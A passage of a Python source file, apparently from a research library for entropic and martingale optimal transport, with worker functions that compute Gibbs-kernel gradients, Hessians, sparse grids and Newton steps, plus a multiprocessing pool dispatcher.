grad)\r\n \r\n def hessian_h(hi_index):\r\n DATA['hi'][index] = hi_index[0]\r\n hi = DATA['hi']\r\n \r\n if calc_phi:\r\n phi_i = DATA['phi_i']\r\n arg_Gibbs = (cost_array-psi-phi_i-np.sum(np.reshape(hi,(1,dim))*Y_X,\r\n axis = 1))/epsilon\r\n multiplied_by_h_index = Y_X_index\r\n else:\r\n arg_Gibbs = (cost_array-psi-phi_h_x-np.sum(np.reshape(hi,(1,dim))*gridY,\r\n axis = 1))/epsilon\r\n multiplied_by_h_index = gridY_index\r\n Gibbs = np.exp(arg_Gibbs)\r\n hess = 1/epsilon*np.sum(np.reshape(Gibbs,\r\n (lenY,1,1))*np.reshape(multiplied_by_h_index,\r\n (lenY,1,1))*np.reshape(multiplied_by_h_index,\r\n (lenY,1,1)), axis = 0)\r\n if calc_phi:\r\n if gf.approx_Equal(DATA['hi_index'], hi_index, tolerance = tol_Newton_h):\r\n gradient = DATA['gradient']\r\n else:\r\n gradient = value_h(hi_index)[1]\r\n hess -= 1/epsilon*1/mu_i*np.reshape(gradient,\r\n (1, 1))*np.reshape(gradient,(1, 1))\r\n hessian = hess/mu_i\r\n hessian += pen_h*np.eye(1)\r\n return hessian\r\n \r\n x0 = np.array([hi_index_0])\r\n if debug_mode == 5:\r\n disp = True\r\n else:\r\n disp = False\r\n if newNewton:\r\n result = gf.Newton(value_h, hessian_h, x0 = x0, tol = tol_Newton_h,\r\n maxiter= nmax_Newton_h, disp= disp,\r\n pow_distance = pow_distance,\r\n order_hess = 1./epsilon, invertor = zero*epsilon)\r\n else:\r\n result = minimize(value_h, x0 = x0,\r\n method='Newton-CG',\r\n jac=True, hess = hessian_h,\r\n tol=tol_Newton_h,\r\n options={'maxiter': nmax_Newton_h,\r\n 'xtol' : tol_Newton_h,\r\n 'disp' : disp})\r\n \r\n time_comp = timeit.default_timer()-t_0\r\n hi = hi_0\r\n if calc_phi:\r\n if newNewton:\r\n hi[index] = result['x']\r\n elif DATA['result_found']:\r\n hi[index] = DATA['result_opt']\r\n else:\r\n hi[index] = result.x\r\n if gf.approx_Equal(hi, DATA['hi'], tolerance = zero**2):\r\n phi_i = DATA['phi_i']\r\n else:\r\n phi_i = phi_from_h(hi)\r\n\r\n else:\r\n if newNewton:\r\n hi[index] = result['x']\r\n elif DATA['result_found']:\r\n hi[index] = DATA['result_opt']\r\n else:\r\n hi[index] = result.x\r\n phi_i = phi_h_x+np.dot(hi, x_i)\r\n if debug_mode == 5:\r\n print(\"grad norm wololo\", np.linalg.norm(DATA['gradient']))\r\n return {'hi' : hi , 'i' : i , 'time_comp' : time_comp, 'phi_i' : phi_i}\r\n\r\n\r\ndef auxiliary_cost_minimax(i, arg):\r\n gridY = arg['gridY']\r\n cost = arg['cost']\r\n gridX = arg['gridX']\r\n \r\n t_0 = timeit.default_timer()\r\n cost_array = cost(gridX[i],gridY)\r\n min_cost = np.amin(cost_array)\r\n max_cost = np.amax(cost_array)\r\n time_comp = timeit.default_timer()-t_0\r\n return {'i' : i , 'time_comp' : time_comp, 'min_cost' : min_cost,\r\n 'max_cost': max_cost}\r\n \r\n \r\ndef auxiliary_duplicate_values_grid(n, arg):\r\n value_names = arg['value_names']\r\n old_grid = arg['old_grid']\r\n point = arg['new_grid'][n]\r\n dim = arg['dim']\r\n \r\n result = {'n' : n}\r\n t_0 = timeit.default_timer()\r\n point = np.resize(point, (1, dim))\r\n distances = np.linalg.norm(old_grid-point, axis = 1)\r\n min_index = np.argmin(distances)\r\n for value_name in value_names:\r\n result['new_'+value_name] = arg['old_'+value_name][min_index]\r\n time_comp = timeit.default_timer()-t_0\r\n \r\n result['time_comp'] = time_comp\r\n return result\r\n\r\n \r\ndef auxiliary_vg_phi(i, arg):\r\n gridY = arg['gridY']\r\n cost_raw = arg['cost']\r\n min_cost = arg['min_cost']\r\n max_cost = arg['max_cost']\r\n def cost(x, y):\r\n cost_computed = cost_raw(x, y)\r\n if min_cost == max_cost:\r\n return 0.*cost_computed\r\n else:\r\n return (cost_computed+min_cost)/(max_cost-min_cost)\r\n phi = arg['phi']\r\n psi = arg['psi']\r\n h = arg['h']\r\n epsilon = arg['epsilon']\r\n gridX = arg['gridX']\r\n dim = arg['dim']\r\n martingale = arg['martingale']\r\n \r\n t_0 = timeit.default_timer()\r\n cost_array = cost(gridX[i],gridY)\r\n if martingale:\r\n Y_X = gridY-np.reshape(gridX[i],(1,dim))\r\n arg_Gibbs = (cost_array-phi[i]-psi-np.sum(np.reshape(h[i],\r\n (1,dim))*Y_X, axis = 1))/epsilon\r\n else:\r\n arg_Gibbs = (cost_array-phi[i]-psi)/epsilon\r\n Gibbs = np.sum(np.exp(arg_Gibbs))\r\n gradient = -Gibbs\r\n value = epsilon*Gibbs\r\n time_comp = timeit.default_timer()-t_0\r\n return {'i' : i , 'time_comp' : time_comp, 'value' : value,\r\n 'gradient': gradient}\r\n\r\n\r\n\r\n\r\n\r\ndef auxiliary_vg_psi(j, arg):\r\n gridY = arg['gridY']\r\n cost_raw = arg['cost']\r\n min_cost = arg['min_cost']\r\n max_cost = arg['max_cost']\r\n def cost(x, y):\r\n cost_computed = cost_raw(x, y)\r\n if min_cost == max_cost:\r\n return 0.*cost_computed\r\n else:\r\n return (cost_computed+min_cost)/(max_cost-min_cost)\r\n phi = arg['phi']\r\n psi = arg['psi']\r\n h = arg['h']\r\n epsilon = arg['epsilon']\r\n gridX = arg['gridX']\r\n dim = arg['dim']\r\n martingale = arg['martingale']\r\n \r\n t_0 = timeit.default_timer()\r\n cost_array = cost(gridX,gridY[j])\r\n if martingale:\r\n Y_X = np.reshape(gridY[j],(1,dim))-gridX\r\n arg_Gibbs = (cost_array-phi-psi[j]-np.sum(h*Y_X, axis = 1))/epsilon\r\n else:\r\n arg_Gibbs = (cost_array-phi-psi[j])/epsilon\r\n Gibbs = np.sum(np.exp(arg_Gibbs))\r\n gradient = -Gibbs\r\n value = epsilon*Gibbs\r\n time_comp = timeit.default_timer()-t_0\r\n return {'j' : j , 'time_comp' : time_comp, 'value' : value,\r\n 'gradient': gradient}\r\n\r\n\r\ndef auxiliary_vg_h(i, arg):\r\n gridY = arg['gridY']\r\n cost_raw = arg['cost']\r\n min_cost = arg['min_cost']\r\n max_cost = arg['max_cost']\r\n def cost(x, y):\r\n cost_computed = cost_raw(x, y)\r\n if min_cost == max_cost:\r\n return 0.*cost_computed\r\n else:\r\n return (cost_computed+min_cost)/(max_cost-min_cost)\r\n phi = arg['phi']\r\n psi = arg['psi']\r\n h = arg['h']\r\n epsilon = arg['epsilon']\r\n gridX = arg['gridX']\r\n dim = arg['dim']\r\n lenY = arg['lenY']\r\n \r\n t_0 = timeit.default_timer()\r\n Y_X = gridY-np.reshape(gridX[i],(1,dim))\r\n cost_array = cost(gridX[i],gridY)\r\n if h is None:\r\n arg_Gibbs = (cost_array-phi[i]-psi)/epsilon\r\n else:\r\n arg_Gibbs = (cost_array-phi[i]-psi-np.sum(np.reshape(h[i],(1,dim))*Y_X,\r\n axis = 1))/epsilon\r\n Gibbs = np.exp(arg_Gibbs)\r\n gradient = -np.sum(np.reshape(Gibbs, (lenY,1))*Y_X, axis = 0)\r\n value = epsilon*np.sum(Gibbs)\r\n time_comp = timeit.default_timer()-t_0\r\n return {'i' : i , 'time_comp' : time_comp, 'value' : value,\r\n 'gradient': gradient}\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\ndef auxiliary_hess_phi(i, arg):\r\n gridY = arg['gridY']\r\n cost_raw = arg['cost']\r\n min_cost = arg['min_cost']\r\n max_cost = arg['max_cost']\r\n def cost(x, y):\r\n cost_computed = cost_raw(x, y)\r\n if min_cost == max_cost:\r\n return 0.*cost_computed\r\n else:\r\n return (cost_computed+min_cost)/(max_cost-min_cost)\r\n phi = arg['phi']\r\n psi = arg['psi']\r\n h = arg['h']\r\n epsilon = arg['epsilon']\r\n gridX = arg['gridX']\r\n dim = arg['dim']\r\n p_phi = arg['p_phi']\r\n p_psi = arg['p_psi']\r\n p_h = arg['p_h']\r\n lenY = arg['lenY']\r\n martingale = arg['martingale']\r\n \r\n t_0 = timeit.default_timer()\r\n cost_array = cost(gridX[i],gridY)\r\n if martingale:\r\n Y_X = gridY-np.reshape(gridX[i],(1,dim))\r\n arg_Gibbs = (cost_array-phi[i]-psi-np.sum(np.reshape(h[i],\r\n (1,dim))*Y_X, axis = 1))/epsilon\r\n else:\r\n arg_Gibbs = (cost_array-phi[i]-psi)/epsilon\r\n Gibbs = np.exp(arg_Gibbs)\r\n hess_p = 0.\r\n if p_phi is not None:\r\n hess_p += np.sum(p_phi[i]*Gibbs)\r\n if p_psi is not None:\r\n hess_p += np.sum(p_psi*Gibbs)\r\n if martingale and p_h is not None:\r\n hess_p += np.sum(np.reshape(p_h[i], (1, dim))*Y_X*np.reshape(Gibbs, (lenY, 1)))\r\n hess_p /= epsilon\r\n time_comp = timeit.default_timer()-t_0\r\n return {'i' : i , 'time_comp' : time_comp, 'hess_p' : hess_p}\r\n\r\n\r\n\r\ndef auxiliary_hess_psi(j, arg):\r\n gridY = arg['gridY']\r\n cost_raw = arg['cost']\r\n min_cost = arg['min_cost']\r\n max_cost = arg['max_cost']\r\n def cost(x, y):\r\n cost_computed = cost_raw(x, y)\r\n if min_cost == max_cost:\r\n return 0.*cost_computed\r\n else:\r\n return (cost_computed+min_cost)/(max_cost-min_cost)\r\n phi = arg['phi']\r\n psi = arg['psi']\r\n h = arg['h']\r\n epsilon = arg['epsilon']\r\n gridX = arg['gridX']\r\n dim = arg['dim']\r\n p_phi = arg['p_phi']\r\n p_psi = arg['p_psi']\r\n p_h = arg['p_h']\r\n lenX = arg['lenX']\r\n martingale = arg['martingale']\r\n \r\n t_0 = timeit.default_timer()\r\n cost_array = cost(gridX,gridY[j])\r\n if martingale and p_h is not None:\r\n Y_X = np.reshape(gridY[j],(1,dim))-gridX\r\n arg_Gibbs = arg_Gibbs = (cost_array-phi-psi[j]-np.sum(h*Y_X,\r\n axis = 1))/epsilon\r\n else:\r\n arg_Gibbs = arg_Gibbs = (cost_array-phi-psi[j])/epsilon\r\n Gibbs = np.exp(arg_Gibbs)\r\n hess_p = 0.\r\n if p_phi is not None:\r\n hess_p += np.sum(p_phi*Gibbs)\r\n if p_psi is not None:\r\n hess_p += np.sum(p_psi[j]*Gibbs)\r\n if martingale and p_h is not None:\r\n hess_p += np.sum(p_h*Y_X*np.reshape(Gibbs, (lenX, 1)))\r\n hess_p /= epsilon\r\n time_comp = timeit.default_timer()-t_0\r\n return {'j' : j , 'time_comp' : time_comp, 'hess_p' : hess_p}\r\n\r\n\r\n\r\n\r\ndef auxiliary_hess_h(i, arg):\r\n gridY = arg['gridY']\r\n cost_raw = arg['cost']\r\n min_cost = arg['min_cost']\r\n max_cost = arg['max_cost']\r\n def cost(x, y):\r\n cost_computed = cost_raw(x, y)\r\n if min_cost == max_cost:\r\n return 0.*cost_computed\r\n else:\r\n return (cost_computed+min_cost)/(max_cost-min_cost)\r\n phi = arg['phi']\r\n psi = arg['psi']\r\n h = arg['h']\r\n epsilon = arg['epsilon']\r\n gridX = arg['gridX']\r\n dim = arg['dim']\r\n p_phi = arg['p_phi']\r\n p_psi = arg['p_psi']\r\n p_h = arg['p_h']\r\n lenY = arg['lenY']\r\n \r\n t_0 = timeit.default_timer()\r\n Y_X = gridY-np.reshape(gridX[i],(1,dim))\r\n cost_array = cost(gridX[i],gridY)\r\n arg_Gibbs = (cost_array-phi[i]-psi-np.sum(np.reshape(h[i],(1,dim))*Y_X, axis = 1))/epsilon\r\n Gibbs = np.exp(arg_Gibbs)\r\n hess_p = np.zeros(lenY)\r\n if p_phi is not None:\r\n hess_p += p_phi[i]*Gibbs\r\n if p_psi is not None:\r\n hess_p += p_psi*Gibbs\r\n if p_h is not None:\r\n hess_p += np.sum(np.reshape(p_h[i], (1, dim))*Y_X*np.reshape(Gibbs,\r\n (lenY, 1)), axis = 1)\r\n hess_p = np.sum(np.reshape(hess_p, (lenY, 1))*Y_X, axis = 0)\r\n hess_p /= epsilon\r\n time_comp = timeit.default_timer()-t_0\r\n return {'i' : i , 'time_comp' : time_comp, 'hess_p' : hess_p}\r\n\r\n\r\n\r\n\r\ndef auxiliary_hess_h_inv(i, arg):\r\n gridX = arg['gridX']\r\n gridY = arg['gridY']\r\n cost_raw = arg['cost']\r\n min_cost = arg['min_cost']\r\n max_cost = arg['max_cost']\r\n def cost(x, y):\r\n cost_computed = cost_raw(x, y)\r\n if min_cost == max_cost:\r\n return 0.*cost_computed\r\n else:\r\n return (cost_computed+min_cost)/(max_cost-min_cost)\r\n phi = arg['phi']\r\n psi = arg['psi']\r\n h = arg['h']\r\n epsilon = arg['epsilon']\r\n dim = arg['dim']\r\n lenX = arg['lenX']\r\n lenY = arg['lenY']\r\n zero = arg['zero']\r\n include_phi = arg['include_phi']\r\n# mu = arg['mu']\r\n \r\n t_0 = timeit.default_timer()\r\n Y_X = gridY-np.reshape(gridX[i],(1,dim))\r\n cost_array = cost(gridX[i],gridY)\r\n arg_Gibbs = (cost_array-phi[i]-psi-np.sum(np.reshape(h[i],(1,dim))*Y_X,\r\n axis = 1))/epsilon\r\n Gibbs = np.exp(arg_Gibbs)\r\n# print(\"phi in = \", phi)\r\n# print(\"psi in = \", psi)\r\n# print(\"h in = \", h)\r\n# print(\"Gibbs = \", Gibbs)\r\n hess_h_h = np.reshape(Y_X, (lenY, dim, 1))*np.reshape(Gibbs,\r\n (lenY, 1, 1))*np.reshape(Y_X, (lenY, 1, dim))\r\n hess_h_h = np.sum(hess_h_h, axis = 0)\r\n hess_h_h /= epsilon\r\n dim_final = dim\r\n if include_phi:\r\n hess_phi_phi = np.array([np.sum(Gibbs)/epsilon])\r\n# gf.check(gf.approx_Equal(np.sum(Gibbs), mu[i]), (np.sum(Gibbs), mu[i]))\r\n cross_phi_h = np.reshape(Gibbs, (lenY, 1))*Y_X\r\n cross_phi_h = np.sum(cross_phi_h, axis = 0)\r\n cross_phi_h /= epsilon\r\n# print(\"test is zero\", cross_phi_h)\r\n up = np.concatenate((hess_phi_phi, cross_phi_h))\r\n up = np.reshape(up, (1,dim+1))\r\n down = np.concatenate((cross_phi_h.reshape(dim, 1), hess_h_h), axis = 1)\r\n hess_h_h = np.concatenate((up,down))\r\n dim_final +=1\r\n hess_h_inv = np.linalg.inv(hess_h_h+zero/lenX*np.eye(dim_final))\r\n time_comp = timeit.default_timer()-t_0\r\n return {'i' : i , 'time_comp' : time_comp, 'hess_h_inv' : hess_h_inv}\r\n\r\n\r\n\r\ndef auxiliary_diag_hess_psi(j, arg):\r\n gridY = arg['gridY']\r\n cost_raw = arg['cost']\r\n min_cost = arg['min_cost']\r\n max_cost = arg['max_cost']\r\n def cost(x, y):\r\n cost_computed = cost_raw(x, y)\r\n if min_cost == max_cost:\r\n return 0.*cost_computed\r\n else:\r\n return (cost_computed+min_cost)/(max_cost-min_cost)\r\n phi = arg['phi']\r\n psi = arg['psi']\r\n h = arg['h']\r\n epsilon = arg['epsilon']\r\n gridX = arg['gridX']\r\n dim = arg['dim']\r\n lenX = arg['lenX']\r\n mu = arg['mu']\r\n martingale = arg['martingale']\r\n hess_h_inv = arg['hess_h_inv']\r\n include_phi = arg['include_phi']\r\n zero = arg['zero']\r\n no_impl = arg['no_impl']\r\n \r\n t_0 = timeit.default_timer()\r\n cost_array = cost(gridX,gridY[j])\r\n if martingale:\r\n Y_X = np.reshape(gridY[j],(1,dim))-gridX\r\n arg_Gibbs = arg_Gibbs = (cost_array-phi-psi[j]-np.sum(h*Y_X,\r\n axis = 1))/epsilon\r\n else:\r\n arg_Gibbs = arg_Gibbs = (cost_array-phi-psi[j])/epsilon\r\n Gibbs = np.exp(arg_Gibbs)\r\n if not no_impl:\r\n if not martingale or not include_phi:\r\n diag = -np.sum(Gibbs*Gibbs/np.maximum(mu, zero/lenX))/epsilon\r\n else:\r\n diag = 0.\r\n if martingale:\r\n if include_phi:\r\n ones = np.zeros(lenX)+1.\r\n ones = np.reshape(ones, (lenX, 1))\r\n Y_X_use = np.concatenate((ones, Y_X), axis = 1)\r\n dim_use = dim+1\r\n else:\r\n Y_X_use = Y_X\r\n dim_use = dim\r\n Gibbs_Y_X = np.reshape(Gibbs,(lenX, 1))*Y_X_use/epsilon\r\n Gibbs_Y_X_left = np.reshape(Gibbs_Y_X,(lenX, dim_use, 1))\r\n Gibbs_Y_X_right = np.reshape(Gibbs_Y_X,(lenX, 1, dim_use))\r\n diag -= np.sum(Gibbs_Y_X_left*hess_h_inv*Gibbs_Y_X_right)\r\n else:\r\n diag = 0.\r\n diag += np.sum(Gibbs)/epsilon\r\n time_comp = timeit.default_timer()-t_0\r\n return {'j' : j , 'time_comp' : time_comp, 'diag' : diag}\r\n \r\n \r\n \r\ndef auxiliary_diag_hess_phi_h(i, arg):\r\n gridY = arg['gridY']\r\n cost_raw = arg['cost']\r\n min_cost = arg['min_cost']\r\n max_cost = arg['max_cost']\r\n def cost(x, y):\r\n cost_computed = cost_raw(x, y)\r\n if min_cost == max_cost:\r\n return 0.*cost_computed\r\n else:\r\n return (cost_computed+min_cost)/(max_cost-min_cost)\r\n phi = arg['phi']\r\n psi = arg['psi']\r\n h = arg['h']\r\n epsilon = arg['epsilon']\r\n gridX = arg['gridX']\r\n dim = arg['dim']\r\n nu = arg['nu']\r\n lenY = arg['lenY']\r\n martingale = arg['martingale']\r\n zero = arg['zero']\r\n no_impl = arg['no_impl']\r\n \r\n t_0 = timeit.default_timer()\r\n cost_array = cost(gridX[i],gridY)\r\n if martingale:\r\n Y_X = gridY-np.reshape(gridX[i],(1,dim))\r\n arg_Gibbs = (cost_array-phi[i]-psi-np.sum(np.reshape(h[i],\r\n (1,dim))*Y_X, axis = 1))/epsilon\r\n else:\r\n arg_Gibbs = (cost_array-phi[i]-psi)/epsilon\r\n Gibbs = np.exp(arg_Gibbs)\r\n if not no_impl:\r\n diag_phi = -epsilon*np.sum(Gibbs*Gibbs/np.maximum(nu, zero/lenY))\r\n if martingale:\r\n diag_h = np.sum(np.reshape(Gibbs**2/np.maximum(nu, zero/lenY), (lenY, 1))*Y_X**2, axis = 0)\r\n else:\r\n diag_h = None\r\n else:\r\n diag_phi = 0\r\n if martingale:\r\n diag_h = np.zeros(dim)\r\n else:\r\n diag_h = None\r\n diag_phi += np.sum(Gibbs)/epsilon\r\n if martingale:\r\n diag_h += np.sum(np.reshape(Gibbs, (lenY, 1))*Y_X**2, axis = 0)\r\n time_comp = timeit.default_timer()-t_0\r\n return {'i' : i , 'time_comp' : time_comp, 'diag_phi' : diag_phi, 'diag_h' : diag_h}\r\n \r\n \r\n\r\ndef auxiliary_expectation_cost(i, arg):\r\n gridY = arg['gridY']\r\n cost_raw = arg['cost']\r\n min_cost = arg['min_cost']\r\n max_cost = arg['max_cost']\r\n def cost(x, y):\r\n cost_computed = cost_raw(x, y)\r\n if min_cost == max_cost:\r\n return 0.*cost_computed\r\n else:\r\n return (cost_computed+min_cost)/(max_cost-min_cost)\r\n phi = arg['phi']\r\n psi = arg['psi']\r\n h = arg['h']\r\n phi_test = arg['phi_test']\r\n psi_test = arg['psi_test']\r\n h_test = arg['h_test']\r\n epsilon = arg['epsilon']\r\n gridX = arg['gridX']\r\n dim = arg['dim']\r\n martingale = arg['martingale']\r\n dual = arg['dual']\r\n \r\n t_0 = timeit.default_timer()\r\n cost_array = cost(gridX[i],gridY)\r\n if martingale:\r\n Y_X = gridY-np.reshape(gridX[i],(1,dim))\r\n h_times = np.sum(np.reshape(h[i],(1,dim))*Y_X, axis = 1)\r\n Delta = cost_array-phi[i]-psi-h_times\r\n arg_Gibbs = Delta/epsilon\r\n else:\r\n Delta = cost_array-phi[i]-psi\r\n arg_Gibbs = Delta/epsilon\r\n Gibbs = np.exp(arg_Gibbs)\r\n expectation_i = np.sum(Gibbs*cost_array)\r\n mass = np.sum(Gibbs)\r\n if dual:\r\n expect_dual_i = np.sum(Gibbs*psi_test)\r\n expect_dual_i += mass*phi_test[i]\r\n if martingale:\r\n h_test_times = np.sum(np.reshape(h_test[i],(1,dim))*Y_X, axis = 1)\r\n expect_dual_i += np.sum(Gibbs*h_test_times)\r\n gap_phi = -mass*np.max(cost_array-phi_test[i]-psi_test-h_test_times)\r\n else:\r\n expect_dual_i = None\r\n gap_phi = None\r\n time_comp = timeit.default_timer()-t_0\r\n return {'time_comp' : time_comp, 'expectation_i' : expectation_i,\r\n 'expect_dual_i' : expect_dual_i, 'mass' : mass, 'gap_phi' : gap_phi}\r\n \r\n \r\n\r\n\r\ndef sparsify(vector, structure_matrix, index, dim = None, length = None):\r\n if dim is None:\r\n sparse_vector_matrix = structure_matrix[index].multiply(vector)\r\n sparse_vector = np.array(sparse_vector_matrix.data)\r\n else:\r\n sparse_vector = np.zeros(dim*length)\r\n sparse_vector = np.reshape(sparse_vector, (dim, length))\r\n for d in range(dim):\r\n sparse_vector[d] = sparsify(vector[d], structure_matrix, index)\r\n sparse_vector = sparse_vector.transpose()\r\n return sparse_vector\r\n\r\n\r\n \r\n\r\n\r\ndef auxiliary_sparse_grid(i, arg):\r\n gridY = arg['gridY']\r\n cost_raw = arg['cost']\r\n min_cost = arg['min_cost']\r\n max_cost = arg['max_cost']\r\n def cost(x, y):\r\n cost_computed = cost_raw(x, y)\r\n if min_cost == max_cost:\r\n return 0.*cost_computed\r\n else:\r\n return (cost_computed+min_cost)/(max_cost-min_cost)\r\n phi = arg['phi']\r\n psi = arg['psi']\r\n mu = arg['mu']\r\n nu = arg['nu']\r\n h = arg['h']\r\n epsilon = arg['epsilon']\r\n gridX = arg['gridX']\r\n dim = arg['dim']\r\n martingale = arg['martingale']\r\n proba_min = arg['proba_min']\r\n no_sto = arg['no_sto']\r\n \r\n t_0 = timeit.default_timer()\r\n cost_array = cost(gridX[i],gridY)\r\n if martingale:\r\n Y_X = gridY-np.reshape(gridX[i],(1,dim))\r\n h_times = np.sum(np.reshape(h[i],(1,dim))*Y_X, axis = 1)\r\n Delta = cost_array-phi[i]-psi-h_times\r\n arg_Gibbs = Delta/epsilon\r\n else:\r\n Delta = cost_array-phi[i]-psi\r\n arg_Gibbs = Delta/epsilon\r\n Gibbs = np.exp(arg_Gibbs)\r\n Yx = np.where(Gibbs/mu[i]>= proba_min)[0]\r\n Yy = np.where(Gibbs/nu>= proba_min)[0]\r\n non_zero_x = len(Yx)\r\n non_zero_y = len(Yy)\r\n Xx = np.zeros(non_zero_x)+i\r\n Xy = np.zeros(non_zero_y)+i\r\n if no_sto:\r\n Xx = None\r\n Xy = None\r\n Yx = None\r\n Yy = None\r\n else:\r\n Xx = list(Xx)\r\n Xy = list(Xy)\r\n Yx = list(Yx)\r\n Yy = list(Yy)\r\n time_comp = timeit.default_timer()-t_0\r\n return {'time_comp' : time_comp, 'Xx' : Xx,\r\n 'Yx' : Yx, 'Xy' : Xy, 'Yy' : Yy,\r\n 'non_zero_x' : non_zero_x, 'non_zero_y' : non_zero_y}\r\n\r\n\r\n\r\n\r\n\r\ndef auxiliary_Tan(i, arg):\r\n gridX = arg[ 'gridX']\r\n gridY = arg[ 'gridY']\r\n cost_raw = arg['cost']\r\n min_cost = arg['min_cost']\r\n max_cost = arg['max_cost']\r\n def cost(x, y):\r\n cost_computed = cost_raw(x, y)\r\n if min_cost == max_cost:\r\n return 0.*cost_computed\r\n else:\r\n return (cost_computed+min_cost)/(max_cost-min_cost)\r\n psi= arg['psi']\r\n calc_Gamma= arg['calc_Gamma']\r\n zero= arg['zero']\r\n param_hidden= arg['param_hidden']\r\n loc_convex_hull= arg['loc_convex_hull']\r\n x = gridX[i]\r\n h_i = arg['h'][i]\r\n func = cost(x, gridY)\r\n func -= psi\r\n \r\n t_0 = timeit.default_timer()\r\n DATA = loc_convex_hull(x,func, gridY, zero = zero ,\r\n hidden_contact = calc_Gamma,\r\n param_hidden = param_hidden,\r\n gradient_guess = h_i)\r\n time_CH = timeit.default_timer()-t_0\r\n \r\n time_shit = 0.\r\n \r\n \r\n argvectors = np.array(DATA['argcontact'])\r\n value_loc=DATA['value']\r\n gradient_loc = DATA['gradient']\r\n coeffs = np.array(DATA['coeffs'])\r\n total_argcontact = []\r\n total_contact = []\r\n if calc_Gamma:\r\n total_argcontact = DATA['total_argcontact']\r\n total_contact = DATA['total_contact']\r\n return {'value' : value_loc, 'argcontact' : argvectors, 'coeffs' : coeffs,\r\n 'total_contact' : total_contact, 'total_argcontact' : total_argcontact,\r\n 'gradient' : gradient_loc, 'time_comp' : time_CH ,\r\n 'index' : i, 'time_shit' : time_shit }\r\n \r\n\r\n \r\ndef auxiliary_package(arg):\r\n i_0= arg['i_0']\r\n size_job= arg['size_job']\r\n auxiliary = arg['auxiliary']\r\n total_len= arg['total_len']\r\n if arg['sparse_is_on']:\r\n sparsify = arg['sparsify']\r\n if arg['axis']=='x':\r\n structure_matrix = arg[\"sparse_gridXY\"]\r\n if 'psi' in arg.keys():\r\n psi = arg['psi']\r\n if 'gridY_sparse' in arg.keys():\r\n gridY_sparse = arg['gridY_sparse'] \r\n if 'nu' in arg.keys():\r\n nu = arg['nu'] \r\n if 'p_psi' in arg.keys():\r\n p_psi = arg['p_psi']\r\n elif arg['axis']=='y':\r\n structure_matrix = arg[\"sparse_gridYX\"]\r\n if 'phi' in arg.keys():\r\n phi = arg['phi']\r\n if 'h_sparse' in arg.keys() and arg['martingale']:\r\n h_sparse = arg['h_sparse']\r\n if 'gridX_sparse' in arg.keys():\r\n gridX_sparse = arg['gridX_sparse']\r\n if 'mu' in arg.keys():\r\n mu = arg['mu'] \r\n if 'p_phi' in arg.keys():\r\n p_phi = arg['p_phi'] \r\n if 'p_h_sparse' in arg.keys():\r\n p_h_sparse = arg['p_h_sparse']\r\n else:\r\n raise(\"no \"+arg['axis']+\" axis\")\r\n\r\n package = []\r\n for k in range(size_job):\r\n index = k+i_0\r\n if index >= total_len:\r\n break\r\n if arg['sparse_is_on']:\r\n if arg['axis']=='x':\r\n if 'psi' in arg.keys():\r\n arg['psi'] = sparsify(psi, structure_matrix, k)\r\n lenY = len(arg['psi'])\r\n arg['lenY'] = lenY\r\n if 'gridY_sparse' in arg.keys():\r\n arg['gridY'] = sparsify(gridY_sparse, structure_matrix,\r\n k, dim = arg['dim'], length = lenY) \r\n if 'nu' in arg.keys():\r\n arg['nu'] = sparsify(nu, structure_matrix, k) \r\n if 'p_psi' in arg.keys():\r\n arg['p_psi'] = sparsify(p_psi, structure_matrix, k)\r\n elif arg['axis']=='y':\r\n if 'phi' in arg.keys():\r\n arg['phi'] = sparsify(phi, structure_matrix, k)\r\n lenX = len(arg['phi'])\r\n arg['lenX'] = lenX\r\n if 'h_sparse' in arg.keys() and arg['martingale']:\r\n arg['h'] = sparsify(h_sparse, structure_matrix,\r\n k, dim = arg['dim'], length = lenX) \r\n if 'gridX_sparse' in arg.keys():\r\n arg['gridX'] = sparsify(gridX_sparse, structure_matrix,\r\n k, dim = arg['dim'], length = lenX) \r\n if 'mu' in arg.keys():\r\n arg['mu'] = sparsify(mu, structure_matrix, k) \r\n if 'p_phi' in arg.keys():\r\n arg['p_phi'] = sparsify(p_phi, structure_matrix, k) \r\n if 'p_h_sparse' in arg.keys():\r\n arg['p_h'] = sparsify(p_h_sparse, structure_matrix,\r\n k, dim = arg['dim'], length = lenX)\r\n package.append(auxiliary(index, arg))\r\n return package\r\n\r\n \r\n \r\ndef action_pool(auxiliary = None, apply_elem = None, axis = None,\r\n base_arg = None, var = None, code_name = \"\"):\r\n tasks_per_thread = base_arg['tasks_per_thread']\r\n nb_threads = base_arg['nb_threads']\r\n use_pool = base_arg['use_pool']\r\n print_time_pool = base_arg['print_time_pool']\r\n sparse_is_on = base_arg['sparse_is_on']\r\n if axis == 'x':\r\n total_len = base_arg['lenX']\r\n if sparse_is_on:\r\n base_arg['sparse_gridYX'] = None\r\n elif axis == 'y':\r\n total_len = base_arg['lenY']\r\n if sparse_is_on:\r\n base_arg['sparse_gridXY'] = None\r\n else:\r\n raise(\"Axis \"+axis+\" does not exist.\")\r\n numb_paral = tasks_per_thread*nb_threads\r\n size_job = int(math.ceil(total_len*1./numb_paral))\r\n gf.check(numb_paral*size_job>=total_len,(numb_paral,size_job,total_len))\r\n args = []\r\n base_arg['auxiliary'] = auxiliary\r\n base_arg['size_job'] = size_job\r\n base_arg['total_len'] = total_len\r\n base_arg['axis'] = axis\r\n for j in range(numb_paral):\r\n i_0 = j*size_job\r\n if i_0 >= total_len:\r\n break\r\n base_arg['i_0'] = i_0\r\n arg = dict(base_arg)\r\n if sparse_is_on:\r\n iplus = min(total_len, (j+1)*size_job)\r\n if axis == 'x':\r\n arg['sparse_gridXY'] = arg['sparse_gridXY'][i_0:iplus]\r\n elif axis == 'y':\r\n arg['sparse_gridYX'] = arg['sparse_gridYX'][i_0:iplus]\r\n args.append(arg) \r\n \r\n if use_pool:\r\n pool = Pool(nb_threads)\r\n t_0 = timeit.default_timer()\r\n results = list(pool.map(auxiliary_package, args))\r\n pool.close()\r\n pool.join()\r\n time_pool = timeit.default_timer()-t_0\r\n if print_time_pool:\r\n print(\"time for poolmap \"+code_name, time_pool)\r\n else:\r\n t_0 = timeit.default_timer()\r\n results = list(map(auxiliary_package, args))\r\n if print_time_pool:\r\n print(\"time for map \"+code_name,timeit.default_timer()-t_0)\r\n \r\n total_time = 0.\r\n for elems in results:\r\n for elem in elems:\r\n var = apply_elem(elem, var)\r\n total_time += elem['time_comp'] \r\n \r\n if use_pool:\r\n var['stop_pool'] = False\r\n if total_time < time_pool:\r\n var['stop_pool'] = True\r\n if print_time_pool:\r\n print(\"sum of computation times for \"+code_name+\" = \", total_time)\r\n return 